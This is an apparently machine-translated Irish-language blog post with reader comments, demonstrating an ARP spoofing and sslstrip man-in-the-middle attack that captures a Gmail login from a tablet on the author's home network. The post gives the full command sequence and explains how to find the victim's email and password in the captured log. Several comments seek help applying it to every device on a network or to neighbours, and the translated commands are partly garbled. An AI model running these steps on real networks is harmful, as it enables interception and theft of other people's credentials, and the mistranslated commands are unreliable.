ArpSpoofing agus SSlstrip i nGníomh.

Dia duit Blagairí.

Don lá atá inniu ann tá sampla beag agam de chomh contúirteach is féidir é a bheith ceangailte in aon líonra gan slándáil a dhéanamh dóibh siúd ar mhaith leis an oiread sin againn.

Don lá inniu, táim chun ArpSpoofing a úsáid le Sslstrip chun pasfhocal Gmail a fháil. Chun an timpeallacht a dhéanamh níos rialaithe, chruthaigh mé cuntas darb ainm "testarp@gmail.com".

Agus ós rud é nach maith liom na réamhrá go mór, déanaimis gnó.

Nílim freagrach ag am ar bith as a bhféadann siad a dhéanamh leis an bhfaisnéis seo a leanas. Déanaim é chun críocha oideachais amháin

COMHSHAOL

Seo a leanas an méid atá againn don tástáil seo:

1. Ionsaitheoir: Is é mo ríomhaire deisce nó deisce a bhfuil Debian Wheezy ann. Is féidir leat a shuiteáil ó stórtha sslstrip y dsniff a fháil arpspoofing

2. Íospartach: Is é an t-íospartach Tablet Android nach dteastaíonn uaidh ach a phost a fheiceáil tríd an mbrabhsálaí.

3. An meán: Is é an lár mo Ródaire Cisco DPC2425

SEOLADH.

Seoladh an ionsaitheora: 172.26.0.2

Seoladh an Ródaire: 172.26.0.1

Seoladh an Íospartaigh: 172.26.0.8

AN ATTACK:

Chun beagán níos mó a thuiscint conas a oibríonn an t-ionsaí, is féidir leat dul chuig mo shean IAR-

Is é an chéad rud a dhéanfaimid don ionsaí seo ná an réamhtheachtaí a ghníomhachtú ionas gur féidir lenár ríomhaire an fhaisnéis a chur ar aghaidh chuig an íospartach gan é a bhaint amach. (Seachas sin is ionsaí séanadh seirbhísí a bheadh ​​ann)

Chuige sin úsáidfimid:

echo "1" > /proc/sys/net/ipv4/ip_forward iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 8080

arpspoof -i eth0 -t 172.26.0.8 172.26.0.1
arpspoof -i eth0 -t 172.26.0.1 172.26.0.2
sslstrip -a -w desdelinux -l 8080

Gach ordú i bhfuinneog consól díreach.

Anois má dhéanaimid eireaball -f ó linux feicimid an fhaisnéis beo agus díreach

 

léargas1

 

Mar sin ansin conas a fhaighimid an rud atá uainn?

Cuirimis ár bpost ar an Táibléad ar dtús. Agus muid ag logáil isteach, feicimid go bhfuil na mílte agus na mílte rud le feiceáil ar ár gconsól.

Anois go bhfuil tú déanta táimid chun ár gcomhad "desdelinux" a oscailt le nano

nano desdelinux

le Control + W déanaimid cuardach ar rud ar a dtugtar SECURE POST.

Agus feicfimid rud mar seo.

 

léargas2

 

I measc na líne ollmhór sin nach féidir a fheiceáil tá ríomhphost agus pasfhocal an íospartaigh.

Mar sin rithimid ar dheis go dtí go bhfeicimid an solas ag deireadh an tolláin sa deireadh.

 

léargas3

 

Uair eile feicfimid conas is féidir linn muid féin a chosaint beagáinín ó na hionsaithe seo.

Maidir is


Cloíonn ábhar an ailt lenár bprionsabail eitic eagarthóireachta. Chun earráid a thuairisciú cliceáil anseo.

27 trácht, fág mise

Fág do thrácht

Ní thabharfar do sheoladh r-phoist a fhoilsiú. Réimsí riachtanacha atá marcáilte le *

*

*

  1. Freagrach as na sonraí: Miguel Ángel Gatón
  2. Cuspóir na sonraí: SPAM a rialú, bainistíocht trácht.
  3. Legitimation: Do thoiliú
  4. Na sonraí a chur in iúl: Ní chuirfear na sonraí in iúl do thríú páirtithe ach amháin trí oibleagáid dhlíthiúil.
  5. Stóráil sonraí: Bunachar sonraí arna óstáil ag Occentus Networks (EU)
  6. Cearta: Tráth ar bith is féidir leat do chuid faisnéise a theorannú, a aisghabháil agus a scriosadh.

  1.   @Jlcmux a dúirt

    Tapaím an deis seo a rá nuair a foilsíodh an post, nach raibh na horduithe ceart.

    Tá an t-ordú iptables ag an deireadh in easnamh ar an 8080 atá ar líne eile. Agus ansin bhí na horduithe arpspoof go léir ar an líne chéanna. Gach ordú a bheith ar líne dhifriúil.

    Tá súil agam go bhfeicfidh an t-eagarthóir é agus go mbeidh sé in ann é a shocrú.

    Beannachtaí.

    1.    Lámhleabhar na Foinse a dúirt

      Tá na ceartúcháin a luann tú déanta agam, an bhfuil sé sin ceart go leor?

      Má tá tú chun cód a chur isteach in iontráil roghnaithe, bain úsáid as an amharc HTML, agus fíoraigh go bhfuil an t-alt ceart sula seoltar é ar feitheamh. Go raibh maith agat.

  2.   Luis a dúirt

    Is mór an trua go bhfuil a fhios againn go bhfuil daoine againn nach bhfuil eolas acu chomh leochaileach. Faisnéis an-mhaith fiú nuair nach dtuigim mórán den ábhar tuigim an tábhacht. Go raibh maith agat!
    Maidir is

  3.   Giskard a dúirt

    Ach ní oibríonn sé sin ach má tá an t-ionsaitheoir agus an t-íospartach ar an líonra céanna. Ar aon chuma, feictear dom má nascann tú (agus tú ar an líonra céanna) ag baint úsáide as HTTPS, ní tharlaíonn sé sin toisc go bhfuil na sonraí criptithe FAOI do mheaisín a fhágáil. Má nascann tú le HTTP (gan S) sílim go bhfeiceann tú na heochracha fiú agus tú ag féachaint ar an gcábla líonra.

    1.    @Jlcmux a dúirt

      Níl sé fíor. Tá eochair gmail á hacáil agam agus má thugann tú faoi deara go n-úsáideann gmail https. Mar sin? Is é an pointe ná cé go bhfuil https slán, braitheann sé ar http. Mar sin níl sé chomh sábháilte.

      Ná admhaigh an oiread sin faoi https nach bhfuil an S do Superman tá sé le haghaidh "sábháilte"

    2.    RTen a dúirt

      oibríonn sé le nó gan https, bhain mé triail as le linux distro níos speisialaithe agus oibríonn sé gan fadhbanna

    3.    Lámhleabhar na Foinse a dúirt

      Is féidir leat é a úsáid go beacht chun ceacht a mhúineadh dóibh siúd a ghoid do Wi-Fi. 😀

      Tá sé níos mó nó níos lú cosúil leis an méid a dúirt siad i bhfad ó shin ar bhlag Chema Alonso:

      http://www.elladodelmal.com/2013/04/hackeando-al-vecino-hax0r-que-me-roba.html
      http://www.elladodelmal.com/2013/04/hackeando-al-vecino-hax0r-que-me-roba_5.html

      1.    réóntán a dúirt

        Ostia, go hiontach cad a dhéanann sé! / Agus ansin insíonn siad do mo pharanóideach gach uair a úsáidim an VPN nuair a théann siad chun an cuntas bainc a sheiceáil…). Dála an scéil, caithfidh tú a fheiceáil cé chomh ciniciúil atá daoine sna tráchtanna ... más sa deireadh atá sé ag goid ...

        1.    am mionlach3000 a dúirt

          Anois caithfimid rang teagaisc a ghlacadh ar conas do sheirbhís VPN féin a chruthú agus a thairiscint.

      2.    Daniel a dúirt

        Tá an scéal a nascann tú an-spéisiúil, is cosúil gur fiú leabhar úrscéal é, agus cuireann sé sin i gcuimhne dom nuair a d’úsáid mé idirlíon mo chomharsana agus cé go ndeirim go bhfuil an t-ábhar ar eolas agam, sílim nach bhféadfainn riamh fíor-thoisí na an chontúirt a d’fhéadfadh a bheith agam go deireanach, ar ámharaí an tsaoil dom, níor athraigh siad ach an focal faire go WPA2 agus sin an áit ar thosaigh mo scéal leis an ISP haha

    4.    Oileán Mhuirís a dúirt

      Sin an fáth a deir an teideal Sslstrip i ngníomh.

      Oibríonn sé, fad is atá an t-ionsaitheoir sa lár

  4.   anon a dúirt

    Cén tonn a n-oibríonn tú ag priosma? -.-
    uimh.
    Cad atá tú ag fanacht le d’iarratas XD a sheoladh
    Maidir
    post maith

  5.   auroszx a dúirt

    Suimiúil, déanfaidh mé tástáil oideachais níos déanaí ... B’fhéidir go bhféadfainn fiú an focal faire a bhaint den WiFi agus spraoi a bheith agam ar feadh beagán 😛
    Ar aon seans, an bhféadfá rud éigin cosúil leis a dhéanamh chun leathanaigh éagsúla a sheoladh chuig na cinn a d’iarr an sprioc? Mar shampla, ba mhaith leo Facebook a oscailt agus déanaim iad a atreorú chuig Google? 😛

    1.    @Jlcmux a dúirt

      Sea. Ach is rolla an-difriúil ar fad é.

      B'fhéidir go gcuirfidh mé sa phost é níos déanaí.

  6.   nuabheirthe a dúirt

    post an-mhaith, tá na hábhair seo an-oideachasúil, anois caithfimid a bheith in ann dul i gcoinne an ionsaí seo, ós rud é go nascann cuid acu (cosúil liomsa) le líonraí poiblí (an ollscoil mar shampla) bheadh ​​sé ina chuidiú é a sheachaint.

    Beannachtaí!

  7.   díreach-eile-dl-úsáideoir a dúirt

    Níor oibrigh sé dom 🙁

  8.   WOW a dúirt

    Teipeann ar rud éigin dom anseo, seachas go ndéantar naisc https a chriptiú trí dheimhniú freastalaí (a luaithe a bhíonn an deimhniú agat ar do mheaisín, is é do bhrabhsálaí atá i gceannas ar an criptiú) le iptables déanann tú calafort 80 (http) a atreorú, ní 443, atá https

    1.    @Jlcmux a dúirt

      Shíl mé é sin freisin. Is é an pointe ná cé go bhfuil https “slán” braitheann sé ar an drochuair ar http. Mar sin baineann sslstrip leas as sin, cuireann sé ar an mbrabhsálaí a chreidiúint go bhfuil dintiúir https á n-úsáid aige ach níl.

      1.    WOW a dúirt

        cac naofa! ach ba cheart go bhfeicfeadh an brabhsálaí rabhadh mar “tagann an deimhniú seo ó shuíomh amhrasach nó rud éigin mar sin” ... is cinnte go mbeidh orm tástálacha XD a dhéanamh

        1.    @Jlcmux a dúirt

          Níl, ní thagann aon rud amach i ndáiríre.

  9.   díreach-eile-dl-úsáideoir a dúirt

    D'oibrigh sé dom sa deireadh
    Táim ceangailte ar líonra WEP le pasfhocal, agus thaispeáin sé an focal faire dom go díreach ar aon nós.

    Ceist. An féidir leat an nós imeachta céanna a dhéanamh ach maidir leis na ríomhairí go léir atá ceangailte leis an líonra, in ionad íospartach aonair a bheith agat?

    1.    @Jlcmux a dúirt

      Is féidir leat. Ach níl turgnaimh déanta agam. Bain triail as tú féin agus inis dúinn conas atá ag éirí leat.

  10.   Sinnick19 a dúirt

    Is é an t-aon rud a fhaighim leis seo ná go dtéann meaisín an íospartaigh as líne, ach ní thaispeánann an sslstrip aon rud dom: /

    1.    @Jlcmux a dúirt

      Ba chóir duit an balla dóiteáin a dhíchumasú ar feadh nóiméad. Nó ar a laghad naisc atá ag teacht isteach a chumasú.

  11.   An tUasal Black a dúirt

    Ní raibh Probe agus mé in ann ach ainm úsáideora agus pasfhocal an leathanaigh facebook a fheiceáil, i gmail ní bhfuair mé toradh ar bith sa logáil, freisin ní raibh de dhíth orm ach líne arpspoof «arpspoof -i -t«. Ar an láimh eile, ní fhéadfadh an meaisín íospartach roinnt leathanaigh a oscailt. Leanfaidh mé ar aghaidh ag imscrúdú, tá sé an-suimiúil. Cúnamh dóibh siúd a úsáideann Manjaro, is iad na pacáistí atá le suiteáil: dsniff (seo arpspoff), casta agus python2-pyopenssl. Is féidir Sslstrip a íoslódáil anseo: http://www.thoughtcrime.org/software/sslstrip/
    Chun é a rith $ python2 sslstrip.py
    Beannachtaí.

  12.   An tUasal Black a dúirt

    Níor tháinig sé amach ach is é an líne arpspoof: #arpspoof -i int -t ip-íospartach ip-ródaire

  13.   gilbert a dúirt

    féach Déanaim go díreach an méid a deir tú:

    macalla "1"> / proc / sys / net / ipv4 / ip_forward iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-port 8080

    arpspoof -i eth0 -t 172.26.0.8 172.26.0.1
    arpspoof -i eth0 -t 172.26.0.1 172.26.0.2

    Is í an fhadhb atá ann ná go bhfágtar an t-íospartach, ar ríomhaire eile atá agam anseo i mo sheomra, gan nasc leis an bpointe go gcaithfidh mé an ródaire a atosú, cad is féidir liom a dhéanamh, cabhrú liom.

    Rud eile a bhfuilim ag obair le meaisín fíorúil, agus nuair a fhorghníomhaím an t-ordú iwconfig, ní bhíonn wlan0 le feiceáil, ná nuair a fhorghníomhaím ifconfig, áfach, má tá idirlíon agam ar mo mheaisín fíorúil cad le comhéadan eth0.